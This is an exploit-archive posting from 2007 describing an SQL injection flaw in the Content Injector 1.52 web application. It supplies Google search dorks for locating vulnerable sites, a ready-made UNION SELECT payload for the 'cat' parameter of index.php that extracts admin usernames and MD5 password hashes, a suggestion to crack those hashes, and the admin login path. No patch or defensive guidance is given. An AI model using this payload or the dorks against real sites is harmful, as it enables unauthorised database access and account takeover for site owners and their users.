[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability
# Published : 2007-11-22
# Author : S.W.A.T.
# Previous Title : NetAuctionHelp 4.1 (nsearch) Remote SQL Injection Vulnerability
# Next Title : PHPKIT 1.6.4pl1 article.php Remote SQL Injection Exploit
--==+================================================================================+==--
--==+ Content Injector V1.52 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: S.W.A.T.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Download: http://www.p3mbo.com/cinj152.zip
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): "Powered by Content Injector v1.52"
Dork2(google): Powered by Content Injector v1.52
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It ;)
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
www.site.com/index.php?cat=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/*
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
admin login is at /admin/
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GREETZ: All Xmors Digital Security Team - Str0ke
Own Page: wWw.SvvaT.IR
Group Site: wWw.XmorS.CoM
--==+================================================================================+==--
--==+ Content Injector V1.52 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# www.Syue.com [2007-11-22]